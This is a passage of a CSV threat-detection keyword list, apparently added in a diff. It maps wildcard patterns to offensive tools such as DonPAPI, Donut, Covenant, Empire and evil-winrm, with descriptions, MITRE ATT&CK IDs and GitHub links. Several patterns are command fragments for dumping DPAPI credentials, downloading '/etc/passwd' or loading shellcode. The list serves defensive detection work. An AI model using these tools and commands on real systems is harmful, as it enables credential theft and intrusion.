BE VERY CAREFUL NOT TO LOCKOUT ACCOUNTS!","t1110 - T1114 - T1555","TA0006 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","1","N/A","N/A","10","1498","354","2023-09-22T22:13:14Z","2016-10-04T23:37:37Z" +"*DomainRecon*ridbrute*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*DomainRecon/ADCS*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*DomainRecon/BloodHound*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*DomainRecon/SilentHound*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation 
Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*DomainRecon\ADCSServer.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"*DomainRecon\DC-IPs.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"*DomainRecon\ExploitableSystems.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"*DomainRecon\OxidBindings.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"*DomainRecon\Windows_Servers.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation 
Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"*DomainTrustDiscovery_PowerView.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
+"*domcachedump.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z"
+"*dome.py *","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/v4d1/Dome","1","0","N/A","N/A","4","376","52","2022-03-10T12:08:17Z","2022-02-20T15:09:40Z"
+"*DominicBreuker*","offensive_tool_keyword","Github Username","Github username hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/DominicBreuker","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*DominicBreuker/pspy*","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","N/A","6","10","4030","449","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z"
+"*donapapi -pvk *","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - 
TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z"
+"*donate.v2.xmrig.com:3333*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z"
+"*DoNotUseThisPassword123!*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","0","N/A","10","4","320","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z"
+"*DonPAPI ""$DOMAIN""/*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*donpapi -credz *","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z"
+"*DonPAPI.py *","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z"
+"*donpapi_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - 
T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*donpapi-master.zip*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z"
+"*donut -f *.dll -c * -m RunProcess*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
+"*donut -f c2.dll*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
+"*donut* \DemoCreateProcess.dll *","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z"
+"*donut.exe *.exe*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z"
+"*DONUT_BYPASS_CONTINUE*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z"
+"*donut-loader -*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z"
+"*Donut-Loader -process_id*","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. 
The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","3763","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z"
+"*DonutLoader(*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z"
+"*DonutLoader.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
+"*donut-maker.py -*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z"
+"*donut-maker.py -i *.exe*","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. 
A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","3763","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z"
+"*donut-payload.*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z"
+"*donut-shellcode*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z"
+"*donut-shellcode*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z"
+"*donut-shellcode*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z"
+"*dos-over-tor*","offensive_tool_keyword","dos-over-tor","Proof of concept denial of service over TOR stress test tool. 
Is multi-threaded and supports multiple attack vectors.","T1583 - T1090","TA0040 - TA0043","N/A","N/A","DDOS","https://github.com/skizap/dos-over-tor","1","0","N/A","N/A","1","10","11","2018-07-21T01:44:41Z","2018-07-26T07:05:37Z"
+"*dothatlsassthing*","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","10","4","324","36","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z"
+"*dotnet ./Server.dll*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z"
+"*dotnet inline-execute *","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z"
+"*dotnet Inveigh.dll*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z"
+"*dotnet ParseMalleable/ParseMalleable.dll*","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is 
an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","0","N/A","10","10","198","47","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z"
+"*dotnet_serve_payload*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"*DotNet2JSImplant*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z"
+"*DotNetArtifactGenerator.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z"
+"*DoubleAgent.sln*","offensive_tool_keyword","DoubleAgent","DoubleAgent gives the attacker the ability to inject any DLL into any process. The code injection occurs extremely early during the victims process boot. giving the attacker full control over the process and no way for the process to protect itself. The code injection technique is so unique that its not detected or blocked by any antivirus.DoubleAgent can continue injecting code even after reboot making it a perfect persistence technique to survive reboots/updates/reinstalls/patches/etc. Once the attacker decides to inject a DLL into a process. they are forcefully bounded forever. Even if the victim would completely uninstall and reinstall its program. 
the attackers DLL would still be injected every time the process executes.","T1055 - T1059 - T1053","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Cybellum/DoubleAgent","1","1","N/A","N/A","10","1200","436","2022-08-24T10:32:36Z","2017-03-12T17:05:57Z"
+"*douknowwhoami?d*","offensive_tool_keyword","cobaltstrike","Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/zha0gongz1/DesertFox","1","0","N/A","10","10","123","26","2023-02-02T07:02:12Z","2021-02-04T09:04:13Z"
+"*download *bloodhound*","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*download *Roaming\mRemoteNG\confCons.xml*","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. 
The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021 - T1028 - T1046 - T1078 - T1091 - T1219","TA0003 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","3763","566","2023-06-09T07:42:42Z","2019-05-28T10:53:00Z"
+"*download /etc/passwd*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z"
+"*Download:Cradle.js*","offensive_tool_keyword","Payload-Download-Cradles","This are different types of download cradles which should be an inspiration to play and create new download cradles to bypass AV/EPP/EDR in context of download cradle detections.","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","1","N/A","N/A","3","241","54","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z"
+"*Download_Cradles.*","offensive_tool_keyword","Payload-Download-Cradles","This are different types of download cradles which should be an inspiration to play and create new download cradles to bypass AV/EPP/EDR in context of download cradle detections.","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","1","N/A","N/A","3","241","54","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z"
+"*Download_Execute*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive 
security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z"
+"*DownloadAndExtractFromRemoteRegistry*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z"
+"*DownloadAndExtractFromRemoteRegistry*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*Download-Cradles.cmd*","offensive_tool_keyword","Payload-Download-Cradles","This are different types of download cradles which should be an inspiration to play and create new download cradles to bypass AV/EPP/EDR in context of download cradle detections.","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","1","N/A","N/A","3","241","54","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z"
+"*Download-Execute-PS*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z"
